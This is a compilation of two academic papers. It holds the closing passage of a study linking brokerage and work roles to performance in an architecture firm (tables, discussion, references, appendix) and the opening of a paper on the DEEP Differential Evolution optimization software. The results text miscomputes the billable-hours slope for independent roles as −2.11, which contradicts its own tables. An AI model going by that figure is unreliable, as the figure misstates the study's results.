R2: 0.48; 0.48; 0.62; 0.62. n: 65; 65; 65; 65.
Note: **p < 0.01.

Table 4. Results of OLS and node-level regression analysis for billable hours (t-values in parentheses). Columns: Model 5 (conventional OLS), Model 6 (permutation OLS), Model 7 (conventional OLS), Model 8 (permutation OLS).
Independent work role: 0.43 (1.48); 0.43 (1.44); 0.62 (2.07)*; 0.62 (2.07)*.
Tenure: 0.10 (0.69); 0.10 (0.72); 0.09 (0.65); 0.09 (0.73).
Female: 0.09 (0.37); 0.09 (0.34); 0.10 (0.41); 0.10 (0.46).
Master's degree: 0.31 (1.05); 0.31 (0.89); 0.29 (0.92); 0.29 (0.80).
Inverse of Burt's constraint (Models 5 and 6): −0.91 (−2.55)*; −0.91 (−2.20)*.
Independent × Inv. of Burt's constraint (Models 5 and 6): 1.21 (3.06)**; 1.21 (2.60)*.
Betweenness centrality (Models 7 and 8): −0.25 (−1.67); −0.25 (−1.83).
Independent × Betweenness (Models 7 and 8): 0.32 (1.12); 0.32 (0.94).
Constant: −0.34 (−0.86); −0.34 (na); −0.53 (−1.32); −0.53 (na).
R2: 0.18; 0.18; 0.14; 0.14. n: 65; 65; 65; 65.
Notes: *p < 0.05; **p < 0.01.

According to the main effects of the brokerage measures in Models 1 to 4 in Table 3, brokerage is associated with higher scores for promoting new ideas. When examining the significant interaction effect of the work role in Models 1 and 2 in Table 3, it is evident that employees in interdependent roles benefit from brokerage more than those in independent roles for promoting new ideas. For example, in Models 1 and 2, the positive effect of the inverse of Burt's constraint for interdependent work roles is 2.10, and for independent work roles the effect is 2.08 − 1.78 = 0.30. Further, according to our hypothesis, for independent work roles brokerage should have less effect on role-prescribed performance than for interdependent roles. In Table 4, brokerage is modeled with billable hours, which is the role-prescribed performance measure for independent work roles. The main effects of Models 5 and 6 in Table 4 indicate that brokerage is negatively associated with billable hours. The interaction effect of the work role in Model 5 shows that the negative effect of the inverse of Burt's constraint for interdependent work roles is −0.91 and for independent work roles the effect is −0.90 − 1.21 = −2.11. This shows that higher brokerage is associated with lower role-prescribed performance for independent roles. According to the main effects of the models presented in Tables 3 and 4, brokerage seems to be associated with higher performance in idea promotion and lower performance in billable hours, regardless of work role. However, in order to distinguish the work role-specific effects, further examination is needed. For this purpose, we examined the interactions by studying the simple slopes, which is a standard procedure for probing interaction patterns (Dawson, 2014). After generating the significances of the simple slopes for the interactions of the models with the inverse of Burt's constraint and betweenness centrality for both promoting new ideas and billable hours (Models 1, 3, 5, and 7 in Tables 3 and 4) with Stata's "margins" procedure (Table A1), we confirmed the hypothesis. For promoting new ideas, the coefficients of the simple slopes were statistically significant and positive for interdependent roles with both brokerage measures. Betweenness centrality was positive and significant also for independent roles, suggesting that brokerage is also associated with independent professionals promoting their ideas. This was the case for the independent professionals in our study who were not expected to promote new ideas, which was evident because 12 professionals out of 31 received zero nominations as promoters of new ideas.
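The moderation models above were estimated in Stata and Ucinet VI. The following sketch shows how an analogous conventional OLS with an interaction term, robust standard errors, and simple slopes could be set up with statsmodels in Python; it is an assumption-laden illustration (hypothetical variable names, no node-level permutation p-values), not a reproduction of the reported models.

```python
# Approximate statsmodels sketch of a moderated OLS with robust standard errors and
# simple slopes. Assumptions: hypothetical variable names; the paper's analyses were
# run in Stata and Ucinet VI, and permutation-based p-values are not reproduced here.
import pandas as pd
import statsmodels.formula.api as smf

def moderated_ols(df: pd.DataFrame, dv: str, broker: str):
    """OLS of a role-prescribed performance DV on a z-standardized brokerage measure,
    the work-role dummy, their interaction, and controls, with HC3 robust errors."""
    formula = f"{dv} ~ {broker} * independent_role + tenure + female + masters_degree"
    return smf.ols(formula, data=df).fit(cov_type="HC3")

def simple_slopes(result, broker: str):
    """Slope of the brokerage measure at each value of the work-role dummy."""
    interaction = f"{broker}:independent_role"
    return {
        "interdependent (role = 0)": result.params[broker],
        "independent (role = 1)": result.params[broker] + result.params.get(interaction, 0.0),
    }

# Usage sketch:
# fit = moderated_ols(df, dv="promoting_new_ideas", broker="inv_constraint_z")
# print(fit.summary()); print(simple_slopes(fit, "inv_constraint_z"))
```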
Notably, for interdependent roles, brokerage is associated with lower number of billable hours. Discussion Our study adds knowledge on the relation of brokerage to performance and improves the empirical understanding of how formal organization is related to the informal. In our case organization, our finding is that brokerage is associated with higher role- prescribed performance for those in interdependent roles, but not for those in independent roles. Therefore, our findings show that work role is a contingency, a boundary condition for brokerage. As brokers are bridging structurally distinct groups (Adler and Kwon, 2000; Burt, 1992, 1997; Reagans and McEvily, 2008), brokerage correlates with managerial performance in our empirical setting but does not have an association with independent professional’s performance measured with the amount of billable hours. Theoretical contributions By presenting work role as a boundary condition for brokerage, this paper makes several contributions to theory. First, the study complements earlier studies on the interplay of formal and informal organization (Biancani et al., 2014; Kleinbaum et al., 2013; Soda and Zaheer, 2012; Srivastava, 2015). Our results show that formal and informal structures reinforce each other, as proposed by McEvily et al. (2014) as one interaction mechanism between the formal and informal structures. Second, the study complements the contingency perspective on network theory. The network theory’s structuralist argument suggests a direct causal link from brokerage to performance (e.g. Emirbayer and Goodwin, 1994; Mayhew, 1980), traditionally giving less attention to contingencies. This has probably led to underrepresentation of network studies taking moderators such as work roles into account, only with few exceptions (Ahuja et al., 2003; Brass, 1981; Burt, 1998; Ibarra and Andrews, 1993), and only quite recently, the individual attributes as contingencies have been consistently included in network studies (Landis, 2016). Therefore, this study contributes to most brokerage literature that seems to imply that brokerage position benefits the broker, and sometimes but not always the network, all the time under all circumstances. Our study provides empirical evidence that suggests that it is in the role of managers to broker relations and communication among the horizontally and vertically differentiated units and employees for which they have responsibility. Our study suggests that formal work role not only greatly influences the performance targets, but also limits the advantage of brokerage to the behavior prescribed by the work role only for interdependent work roles. The strength of our study is in its organization- wide approach. We obtained network data from the entire population of employees in the firm with a particularly detailed survey questionnaire backed up with qualitative interviews. We separately surveyed giving-and-getting types of informal work-related communication ties enabling improved accuracy in examining brokerage. This so-called whole-network approach increases the validity of the brokerage measures used in the models (Borgatti et al., 2018). The second strength of our study is that it measured the role-prescribed performance with objective performance data: independent work role’s performance with billable hours from the time sheets and interdependent role’s performance with peer evaluations of idea promotion. 
By doing so, we complement the studies that have connected organization-wide networks and work performance (Brass, 1981; Carboni and Ehrlich, 2013; Cross and Cummings, 2004; Mehra et al., 2001; Sparrowe et al., 2001). Limitations and future research Despite its contributions, this study has several limitations providing motivation for further research. The first one concerns the case study character of our study. Our data were gathered from one firm, which limits the generalizability of the results. Yet, we were able to collect detailed survey, timesheet, and demographic data about the individuals working in the firm, resulting in organization-wide, bounded network data with the dependent variables that were meaningful proxies for performance. Confirming with the interviews and reviewing the self-reported job descriptions of professionals and supervisors, we concluded that the architect office seems like so many professional organizations, where work requires both high talent and extensive training, and where managers have professional backgrounds. The architects are regulated by a national regulatory agency with certification exams, and most of the individuals we studied were certified architects, thus the professional’s work in the firm was similar compared to firms in the same industry. The firm was well established in its market, and the employee 56 The contingent effect of work roles on brokerage in professional organizations turnover was relatively low providing prerequisites for established communication network structures and divisions of labor between the work roles. The second limitation is the reverse causality caused by common method variance, which is the usual limitation discussed in survey-based network studies (e.g. Carboni and Ehrlich, 2013; Sparrowe et al., 2001). We addressed common method variance by constructing our network variables from the first year of study and used the dependent variables from the second year. According to the assumptions of the structuralist approach of network theory, we assumed the causality of brokerage predicting performance in our research design. Our approach speaks to this causality, but as the communication network structures may take time to develop and become rigid, we are still left with a concern of reverse causality in which performance leads to structural advantage to some extent. This may be the case with the employees in interdependent roles, since brokerage was, as expected, associated with a higher idea promoter score, and promoters have a tendency to become central individuals (Obstfeld, 2005; Scott, 2000), making our idea promoter DV actually a measure of prestige. Nevertheless, becoming prestigious in a professional organization arguably requires brokerage between others, so we are certain to have captured the right phenomenon with our measure of idea promotion. The third limitation is related to alternative explanations on the mechanisms of why the nature of work role moderates brokerage. Our argumentation developed around Thompson’s (1967) idea of more independent roles (e.g. professional architects in our case) requiring less collaboration and coordination, thus benefiting less from brokerage is in line with previous research. However, differences in legitimacy between professional architects and managers would provide an alternative explanation for our hypothesis in our data. 
For example, Burt (1998) shows that women do not benefit from brokerage unless they have a more senior mentor as a sponsor, and argues that this effect is common for all low-status individuals in an organization (Burt and Merluzzi, 2014). High-status versus low- status distinction is not entirely unrelated to the interdependent–independent distinction in our paper as the managers, on average, in our case firm have higher tenure and education levels than professional architects. However, nothing in our interviews and discussions in the company signaled to us about a possible legitimacy problem in the company. The fourth limitation is related to our performance measures. Billable hours as a measure of pro fessional’s performance is uniform across all indi viduals, but the idea promotion score merits further examination. Superior evaluations have been the most commonly used across previous network studies, despite variation across superiors (Teigland and Wasko, 2009). Our peer evaluation method’s strongpoint is that it rules out the variance between different supervisors evaluating their subordinates. We considered peer evaluation meaningful, because the size of the firm was rather small, and everyone knew each other since they shared the same open office space. Future research could extend the findings of this paper in numerous directions. One direction comes from the contribution of this paper suggesting the independent–interdependent work role as a boundary condition for brokerage. As brokerage theory has been applied to a wide range of work contexts, which might be argued to vary in terms of interdependence, the interdependence aspect has not been at the core of their research design implying that it should be equally well applicable to both. Moreover, most of the empirical evidence of benefits of brokerage up until now has been done exclusively with managers, therefore coming from the work that is fundamentally interdependent (e.g. chain managers or investment bankers). Further research would be needed to complement brokerage theory with work role point of view to clarify this specific boundary condition. Further research could also investigate more how status differences and legitimacy issues between individuals act as boundary conditions. For theorizing this stream of research, brokerage theory could benefit from hypotheses of status differences coming from evolutionary psychology and behavioral economics. Management theory’s formal–informal aspects present another future research direction. An innovative approach would be to study the co- existence and effectiveness of formal and informal structures with operationalizing formal structures not only as role hierarchies but also as workflow networks derived from project data and control for clearly work-related communication between superiors and employees. As most professional organizations are not as stratified as architectural firms, participating in the same project would serve as a proxy for formal structure. Novel data gathering methods about informal social structure could also be used. Since work-related communication is increasingly taking place digitally, communication data can be gathered from databases in addition to self-administered surveys. 
By analyzing the content of communication by text mining; for example, examining the content of e-mails individuals send each other, and dividing the content between formal and informal communication, would shed light on a multiplicity of relationships, 57 CONNECTIONS efficiency and innovativeness on a large scale, and answer the question as to how these network structures are associated with each other. Managerial implications In addition to the theoretical contributions, our study has implications for managers of professional organizations. According to the extant understanding in the managerial practice, successful organizations are both highly efficient in what they do and capable of adapting to changes. Typically, in professional organizations, professionals work primarily on tasks requiring specialized skills and competence, and managers work primarily in project management, sales, and offering development. Executives of professional organizations, at least in the most artistically and intellectually demanding kind, such as architecture, should therefore proceed with caution with the ideas of flattening formal hierarchies and divisions of labor in their organizations, in order to sustain simultaneous managerial capacity and professional performance. The finding that brokerage affords limited advantage to independent professionals suggests that, contrary to common belief, such people maybe should not invest a great deal of their time in networking and bridge building if that is not what their professional roles require. An informal organization in a professional organization can thus be seen as a mixture of independent professionals and interdependent managers. A successful firm balancing efficiency and adaptation is one that provides room for both independent and interdependent work roles and considers that not everyone should behave as brokers. Conclusion In this paper, we examined how work role moderates the advantages of brokerage for role-prescribed performance. Our findings suggest that the advantage is contingent upon the work role and brokerage facilitates role-prescribed performance for individuals in interdependent roles but not for those in independent roles. References Adler, P. and Kwon, S.-W. 2000. “Social capital: the good, the bad, and the ugly”, In Lesser, E. (Ed.), Know­ ledge and Social Capital. Foundations and Applications. Butterworth-Heineman, Boston, MA, pp. 89–119. Adler, P. S. and Kwon, S.-W. W. 2002. Social capital: prospects for a new concept. Academy of Management Review 27: 17–40. Ahuja, M. K., Galletta, D. F. and Carley, K. M. 2003. Individual centrality and performance in virtual R&D groups: an empirical study. Management Science 49: 21–38. Amabile, T. M. 1996. Creativity in Context, vol. xviii Boulder, CO, 317 pp. Antonakis, J. and Dietz, J. 2011. Looking for validity or testing it? The perils of stepwise regression, extreme- scores analysis, heteroscedasticity, and measurement error. Personality and Individual Differences 50: 409–415. Aral, S. and Van Alstyne, M. 2011. The diversity- bandwidth trade-off. American Journal of Sociology 117: 90–171. Bachrach, D. G., Powell, B. C., Collins, B. J. and Richey, R. G. 2006. Effects of task interdependence on the relationship between helping behavior and group per- formance. Journal of Applied Psychology 91: 1396–1405. Barnes, M., Kalberg, K., Pan, M. and Leung, P. 2016. When is brokerage negatively associated with economic benefits? Ethnic diversity, competition, and common-pool resources. 
Social Networks 45: 55–65. Biancani, S., McFarland, D. A. and Dahlander, L. 2014. The Semiformal Organization. Organization Science 25: 1306–1324. Biddle, B. 1986. Recent developments in role theory. Annual Review of Sociology 12: 67–92. Borgatti, S. P., Everett, M. G. and Johnson, J. C. 2018. Analyzing Social Networks, Sage, London. Brass, D. J. 1981. Structural relationships, job charac- teristics, and worker satisfaction and per formance. Administrative Science Quarterly 26: 331–348. Burt, R. S. 1992. Structural Holes: The Social Structure of Competition, vol. 58, Harvard University Press, Cambridge MA, available at: http://books. google.com/books?id=E6v0cVy8hVIC Burt, R. S. 1997. The contingent value of social capital. Administrative Science Quarterly 42: 339–365. Burt, R. S. 1998. The gender of social capital. Rationality and Society 10: 5–46. Burt, R. S. 2004. Structural holes and good ideas. American Journal of Sociology 110: 349–399. Burt, R. S. and Merluzzi, J. 2014. Embedded brokerage: hubs versus locals. Research in the Sociology of Organizations 40: 161–77. Carboni, I. and Ehrlich, K. 2013. The effect of relational and team characteristics on individual performance: a social network perspective. Human Resource Management 52: 511–535. Carnabuci, G. and Oszegi, D. I. 2015. Social networks, cognitive style, and innovative performance: a contingency perspective. Academy of Management Journal 58: 881–905. Cross, R. and Cummings, J. N. 2004. Tie and network correlates of individual performance in 58 The contingent effect of work roles on brokerage in professional organizations knowledge-intensive work. Academy of Management Journal 47: 928–937. Cummings, T. G. 1978. Self-regulating work groups: a socio-technical synthesis. Academy of Management Review 3: 625–634. Dawson, J. F. 2014. Moderation in management research: what, why, when, and how. Journal of Business and Psychology 29: 1–19. Emirbayer, M. and Goodwin, J. 1994. Network analysis , culture, and the problem of agency. American Journal of Sociology 99: 1411–1454. Etzioni, A. 1964. Modern Organizations Prentice- Hall, Englewood Cliffs, NJ. Fang, R., Landis, B., Zhang, Z., Anderson, M. H., Shaw, J. D. and Kilduff, M. 2015. Outcomes in organizations integrating personality and social networks: a meta-analysis of personality, network position, and work outcomes in organizations. Organization Science 26: 1243–1260. Fleming, L., Mingo, S. and Chen, D. 2007. Collaborative brokerage, generative creativity, and creative success. Administrative Science Quarterly 52: 443–475. Freeman, L. C. 1977. A set of measures of centrality based on betweenness. Sociometry 40: 35–40. Granovetter, M. S. 1973. The strength of weak ties. American Journal of Sociology 78: 1360–1380. Griffin, M. A., Neal, A. and Parker, S. K. 2007. A new model of work role performance: positive behavior in uncertain and interdependent contexts. Academy of Management Journal 50: 327–347. Hansen, M. T. 1999. The search-transfer problem: the role of weak ties in sharing knowledge across organization subunits. Administrative Science Quarterly 44: 82–111. Hansen, M. T. and Haas, M. R. 2001. Competing for attention in knowledge markets: electronic document dissemination in a management consulting company. Administrative Science Quarterly 46: 1–28. Ibarra, H. and Andrews, S. B. 1993. Power, social influence, and sense making: effects of network centrality and proximity on employee perceptions. Administrative Science Quarterly 38: 277–303. Katz, D. and Kahn, R. L. 1978. 
The Social Psychology of Organizations 2nd ed., Wiley, New York, NY. Kleinbaum, A. M., Stuart, T. E. and Tushman, M. L. 2013. Discretion within constraint: homophily and structure in a formal organization. Organization Science 24: 1316–1357. Krackhardt, D. 1990. Assessing the political landscape: structure, cognition, and power in organizations. Admini­ strative Science Quarterly 35: 342–369. Krackhardt, D. J. 1994. “Graph theoretical dimensions of informal organizations”, In Carley, K. M. and Prietula, M. J. (Eds), Computational Organization Theory, L. Erlbaum Associates, Hillsdale, NJ, pp. xvii, 318 pp. Landis, B. 2016. Personality and social networks in organizations: a review and future directions. Journal of Organizational Behavior 37: S107–S121. Langfred, C. W. 2000. Work-group design and autonomy: a field study of the interaction between task interdependence and group autonomy. Small Group Research 31: 54–70. Langfred, C. W. 2005. Autonomy and performance in teams: the multilevel moderating effect of task interdependence. Journal of Management 31: 513–529. Leroy, H., Anseel, F., Gardner, W. L. and Sels, L. 2015. Authentic leadership, authentic followership, basic need satisfaction, and work role performance: a cross- level study. Journal of Management 41: 1677–1697. Lincoln, J. R. 1990. Social structures: a network approach. Administrative Science Quarterly 35: 748–752. Lincoln, J. R. and Miller, J. 1979. Work and friendship ties in organizations: a comparative analysis of relational networks. Administrative Science Quarterly 24: 181–199. March, J. G. 1991. Exploration and exploitation in organizational learning. Organization Science 2: 71–87. Marsden, P. (2011), “Survey methods for network data”, In Scott, J. and Carrington, P. J. (Eds), The Sage Handbook of Social Network Analysis, Sage Publications, London, pp. 370–388. Mayhew, B. H. 1980. Structuralism Versus Indi- vidualism: part 1, Shadowboxing in the Dark. Social Forces 59: 335–375. McEvily, B., Soda, G. and Tortoriello, M. 2014. More formally: rediscovering the missing link between formal organization and informal social structure. The Academy of Management Annals 8: 299–345. Mehra, A., Kilduff, M. and Brass, D. J. 2001. The social networks of high and low self-monitors: implications for workplace performance. Administrative Science Quarterly 46: 121–146. Merton, R. 1939. Bureaucratic structure and personality. Social Forces 18: 560–568. Obstfeld, D. 2005. Social Networks, the tertius iungens orientation, and involvement in innovation. Administrative Science Quarterly 50: 100–130. Padgett, J. F. and Ansell, C. K. 1993. Robust action and the rise of the Medici, 1400-1434. American Journal of Sociology 98: 1259–1319. Pfeffer, J. and Salancik, G. R. 1975. Determinants of supervisory behavior: a role set analysis. Human Relations 28: 139–154. Reagans, R. and McEvily, B. 2003. Network structure and knowledge transfer: the effects of cohesion and range. Administrative Science Quarterly 48: 240–267. Reagans, R. and McEvily, B. 2008. Contradictory or compatible? Reconsidering the “Trade-Off” between brokerage and closure on knowledge sharing. Network Strategy 25: 275–313. Reagans, R. and Zuckerman, E. W. 2001. Networks, diversity, and productivity: the social capital of corporate R&D teams. Organization Science 12: 502–517. Saavedra, R., Earley, P. C. and Van Dyne, L. 1993. Complex interdependence in task-performing groups. Journal of Applied Psychology 78: 61–72. 59 CONNECTIONS Scott, J. 2000. 
Appendix

Table A1. Simple slopes of the Models 1, 3, 5, and 7 (delta method).

Outcome / network measure            Independent work role   dy/dx      SE        z       P > |z|   95% conf. interval
Promoting new ideas
  Inv. of Burt's constraint          0                        2.09692    0.60510    3.47   0.001     0.88567,  3.30816
                                     1                        0.31451    0.19970    1.57   0.121    −0.08523,  0.71427
  Betweenness centrality             0                        0.86236    0.14562    5.92   0.000     0.57087,  1.15386
                                     1                        0.53269    0.22076    2.41   0.019     0.09077,  0.97460
Billable hours
  Inv. of Burt's constraint          0                       −0.90929    0.35692   −2.55   0.014    −1.62375, −0.19484
                                     1                        0.30558    0.18013    1.70   0.095    −0.05499,  0.66157
  Betweenness centrality             0                       −0.25708    0.15388   −1.67   0.100    −0.56511,  0.05093
                                     1                        0.06624    0.24507    0.27   0.788    −0.42432,  0.55680

Note: Statistically significant slopes italicized.

work_33nbguho3jgb5kkpigcjwnzm64 ----

Submitted 3 November 2015
Accepted 21 June 2016
Published 8 August 2016

Corresponding author: Konstantin Kozlov, kozlov_kn@spbstu.ru, mackoel@gmail.com
Academic editor: Sandra Gesing
Additional Information and Declarations can be found on page 16
DOI 10.7717/peerj-cs.74
Copyright 2016 Kozlov et al.
Distributed under Creative Commons CC-BY 4.0
OPEN ACCESS

A software for parameter optimization with Differential Evolution Entirely Parallel method

Konstantin Kozlov1, Alexander M. Samsonov1,2 and Maria Samsonova1
1 Mathematical Biology and Bioinformatics Lab, IAMM, Peter the Great St. Petersburg Polytechnic University, St. Petersburg, Russia
2 Ioffe Institute, Saint Petersburg, Russia

ABSTRACT

Summary.
The Differential Evolution Entirely Parallel (DEEP) package is software for finding unknown real and integer parameters in dynamical models of biological processes by minimizing one or even several objective functions that measure the deviation of the model solution from data. Numerical solutions provided by the most efficient global optimization methods are often problem-specific and cannot be easily adapted to other tasks. In contrast, DEEP allows a user to describe both the mathematical model and the objective function in any programming language, such as R, Octave, or Python. Being implemented in C, DEEP performs as well as the top three methods from the CEC-2014 (Competition on Evolutionary Computation) benchmark and has been successfully applied to several biological problems.

Availability. The DEEP method is open source and free software distributed under the terms of the GPL licence version 3. The sources are available at http://deepmethod.sourceforge.net/ and binary packages for Fedora GNU/Linux are provided for the RPM package manager at https://build.opensuse.org/project/repositories/home:mackoel:compbio.

Subjects: Computational Biology, Distributed and Parallel Computing, Optimization Theory and Computation
Keywords: Differential Evolution, Parameter optimization, Mathematical modeling, Parallelization, Bioinformatics, Open source software

INTRODUCTION

The estimation of dynamical model parameters that minimize the discrepancy between the model solution and a set of observed data is among the most important and widely studied problems in applied mathematics, and is known as an inverse problem of mathematical modeling (Mendes & Kell, 1998; Moles, Mendes & Banga, 2003). Numerical strategies for solving an inverse problem usually involve optimization methods. Many global and local, stochastic and deterministic optimization techniques, including nature-inspired ones, have been developed and implemented in a wide range of free, open source and commercial software packages.

Mathematical modeling, one of the primary tools of computational systems biology, provides new insights into the mechanisms that control biological systems. It is attractive to experimentalists because carefully selected models have predictive ability. Researchers benefit from the ability of a model to predict in silico the consequences of a biological experiment that was not used for training. The properties of a model are determined by the structure of its mathematical description and the values of the unknown constants and control parameters that represent the coefficients of the underlying biochemical reactions. These unknowns are to be found as the best-suited solution to an inverse problem of mathematical modeling, i.e., by fitting the model output to experimental observations.
The parameter set is to be reliable, and different types of data are to be considered. The development of reliable and easy-to-use algorithms and programs for the solution of the inverse problem remains a challenging task due to the diversity and high computational complexity of biomedical applications, as well as the necessity to treat large sets of heterogeneous data.

In systems biology the commonly used global optimization algorithm is parallel Simulated Annealing (SA) (Chu, Deng & Reinitz, 1999). This method requires considerable CPU time, but it is capable of eventually finding the global extremum and runs efficiently in parallel computations. However, the wide range of methods called Genetic Algorithms (GA) was developed later and successfully applied to biological problems (Spirov & Kazansky, 2002). Modern evolutionary algorithms such as Evolution Strategies (ESs) or Differential Evolution (DE) can outperform other methods in the estimation of parameters of several biological models (Fomekong-Nanfack, Kaandorp & Blom, 2007; Fomekong-Nanfack, 2009; Suleimenov, 2013).

The general challenge in the efficient implementation of global optimization methods is that they depend on problem-specific assumptions and thus cannot be easily adapted to other problems. For example, in SA both the final result and the computational time depend on the so-called cooling schedule; the success of GA optimization strongly depends on the selected mutation, recombination and selection rules; and evolutionary algorithms rely heavily on the algorithmic parameters that define the model of evolution.

Currently, many metaheuristic approaches exist for parameter estimation in biology. For example, enhanced Scatter Search (Egea, Martí & Banga, 2010), implemented in the MEIGOR (Metaheuristics for systems biology and bioinformatics global optimization) package for the R statistical language, was reported to outperform state-of-the-art methods (Egea et al., 2014). This method can provide high quality solutions for integer and real parameters; however, it is computationally expensive.

We developed DEEP, a software package that implements the Differential Evolution Entirely Parallel (DEEP) method introduced recently (Kozlov & Samsonov, 2011). The rationale behind the design of this programme was to provide open source software with performance comparable to competitive packages, as well as to allow a user to implement both the mathematical model and the comparison of the solution with experimental data in any software package or programming language, such as R, Octave, Python or others.

PROBLEM STATEMENT

The DEEP method was developed to solve the inverse problem of mathematical modeling. For a given mathematical model with parameters $q \in R^K$, where $K$ is the number of parameters, and observable data $Y$, we seek the vector $\hat{q}$:

$\hat{q} = \arg\min F(q, Y)$   (1)

where $F$ is a measure of the deviation of the model prediction from the observable data. Additional constraints may be imposed:

$h_j(q) = 0, \quad j = 1, \ldots, N_H$   (2)

$g_m(q) \le 0, \quad m = 1, \ldots, N_G$   (3)

$q^L_k \le q_k \le q^U_k, \quad k = 1, \ldots, K$   (4)

... $a$, $\beta = \dfrac{|a - b| - 1}{\Psi - 2}$. Then the offspring is created according to the formula $v_{b,j+1} = c_1 + (c_2 - c_1) \circ r$, where $r = \{r_k\}$, $r_k = U(0,1)$, $k = 1, \ldots, K$, are random numbers uniformly distributed between 0 and 1.
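To make the problem statement above concrete, here is a minimal Python sketch, not part of DEEP, showing one common way to fold the constraints of Eqs. (2)-(4) into a single scalar score that a Differential Evolution-style optimizer could minimize; the toy exponential model, the synthetic data and the penalty weight `w` are assumptions made purely for illustration (DEEP itself treats the individual criteria through its configurable aggregation and selection rule rather than requiring such a penalty form).

```python
# A minimal sketch (not part of DEEP) of the optimization problem stated in
# Eqs. (1)-(4): minimize F(q, Y) subject to equality constraints h_j(q) = 0,
# inequality constraints g_m(q) <= 0 and box constraints qL <= q <= qU.
# The toy model, data and penalty weight below are illustrative assumptions.
import numpy as np

def model(q, t):
    # Hypothetical model: simple exponential decay parameterized by q = (A, k).
    A, k = q
    return A * np.exp(-k * t)

def F(q, t, Y):
    # Eq. (1): deviation of the model solution from the observed data Y.
    return np.sum((model(q, t) - Y) ** 2)

def penalized_objective(q, t, Y, qL, qU, h_list=(), g_list=(), w=1e3):
    # One common way to fold Eqs. (2)-(4) into a single scalar score.
    q = np.asarray(q, dtype=float)
    score = F(q, t, Y)
    score += w * sum(h(q) ** 2 for h in h_list)               # h_j(q) = 0
    score += w * sum(max(g(q), 0.0) ** 2 for g in g_list)     # g_m(q) <= 0
    score += w * np.sum(np.clip(qL - q, 0, None) ** 2)        # q >= qL
    score += w * np.sum(np.clip(q - qU, 0, None) ** 2)        # q <= qU
    return score

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    t = np.linspace(0, 5, 20)
    Y = 2.0 * np.exp(-0.7 * t) + 0.01 * rng.normal(size=t.size)  # synthetic data
    qL, qU = np.array([0.0, 0.0]), np.array([10.0, 5.0])
    print(penalized_objective([2.0, 0.7], t, Y, qL, qU))
```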
Selection rule

Algorithm 3. SELECTION

proc select (individual) = {
    if (F < the value of the parent) then
        Accept offspring
    else
        for all criteria Fi, hj, gm as f do
            if (f < the value of the parent) then
                Generate the random number U.
                if (U < control parameter for this criterion) then
                    Accept offspring
                end if
            end if
        end for
    end if
}

In order to increase the robustness of the procedure we have implemented the following selection rule for DE, described in detail in Kozlov et al. (2013) (see the Algorithm 3 insertion). Briefly, several different objective functions are used to decide whether an offspring will be selected for the new generation. Firstly, the main objective function is checked. The offspring replaces its parent if the value of this function for the offspring's set of parameters is less than that for the parental one. In the opposite case the additional objective functions are considered. The offspring replaces its parent if the value of any other objective function is better and a randomly selected value is less than the predefined parameter for this function.

Preserving population diversity

The original DE algorithm was highly dependent on internal parameters, as reported by other authors; see, for example, Gaemperle, Mueller & Koumoutsakos (2002). An efficient adaptive scheme for the selection of the internal parameters $S_k$ and $p_k$ based on the control of the population diversity was proposed in Zaharie (2002). Let us consider the variation of parameter $k$ in the current generation:

$\mathrm{var}_k = \frac{1}{NP} \sum_{i=1}^{NP} \left( q_{ik} - \frac{1}{NP} \sum_{l=1}^{NP} q_{lk} \right)^2$

where $k = 1, \ldots, n$. For the next generation the scaling constant is calculated by

$S_k = \begin{cases} \sqrt{\dfrac{NP(\rho_k - 1) + p_k(2 - p_k)}{2\, NP\, p_k}}, & NP(\rho_k - 1) + p_k(2 - p_k) \ge 0 \\ S_{\inf}, & NP(\rho_k - 1) + p_k(2 - p_k) < 0 \end{cases}$

or alternatively the crossover probability is adopted as

$p_k = \begin{cases} -(NP\, S_k^2 - 1) + \sqrt{(NP\, S_k^2 - 1)^2 - NP(1 - \rho_k)}, & \rho_k \ge 1 \\ p_{\inf}, & \rho_k < 1 \end{cases}$

where $S_{\inf} = 1/\sqrt{NP}$, $p_{\inf} = 0$, $\rho_k = \gamma \left( \mathrm{var}^{\mathrm{previous}}_k / \mathrm{var}_k \right)$, and $\gamma$ is a new constant that controls the decrease of the variability of parameters in the course of the iteration process.

Mixed integer-real problems

DE operates on floating point parameters, while many real problems contain integer parameters, e.g., indices of some kind. Two algorithms for parameter conversion from real to integer are implemented in the DEEP method, as described in Kozlov et al. (2013). The first method rounds off a real value to the nearest integer number. The second procedure consists of the following steps:
• The values are sorted in ascending order.
• The index of the parameter in the floating point array becomes the value of the parameter in the integer array.

Parallelization of objective function calculation

Algorithm 4. OBJECTIVE FUNCTION

proc objfunc (population) = {
    Create a Pool of a specified number of worker threads.
    Create an Asynchronous Queue of tasks Q in the Pool.
    for all individuals in population as x do
        Push x to queue Q.
    end for
    Wait for all worker threads in the Pool to finish.
}

proc Worker Thread (parameters) = {
    1. Transform parameters from real to integer as needed.
    2. Save parameters into a temporary file of the specified format.
    3. Call the specified program and supply the temporary file to it.
    4. Capture the output of the program.
    5. Split the output with the specified delimiters into a list of values.
    6. Assign the values in the specified order to Fi, hj, gm, ∀i, j, m.
    7. Return Worker Thread to Pool.
}
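The worker-pool logic of Algorithm 4 can be illustrated with a short Python sketch. This is not DEEP's code (DEEP implements the pool in C on top of GLib); the command name `model.py`, the whitespace-separated parameter file and the whitespace-delimited output assumed below stand in for the formats that are configurable in DEEP.

```python
# A minimal Python sketch of the worker-pool idea in Algorithm 4.  The external
# command, file format and output delimiters are illustrative assumptions; in
# DEEP they are taken from the configuration file.
import subprocess
import tempfile
from concurrent.futures import ThreadPoolExecutor

COMMAND = ["python", "model.py"]   # hypothetical user-supplied program

def evaluate_one(params):
    # Steps 2-6 of the Worker Thread: write parameters to a temporary file,
    # call the user program, capture its output and split it into values.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
        tmp.write(" ".join(repr(p) for p in params))
        path = tmp.name
    out = subprocess.run(COMMAND + [path], capture_output=True, text=True, check=True)
    values = [float(v) for v in out.stdout.split()]
    return values            # assigned in order to F_i, h_j, g_m

def evaluate_population(population, n_threads=4):
    # All evaluations of the current generation are pushed to the pool, and the
    # caller waits for every worker to finish before the next iteration starts.
    with ThreadPoolExecutor(max_workers=n_threads) as pool:
        return list(pool.map(evaluate_one, population))
```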
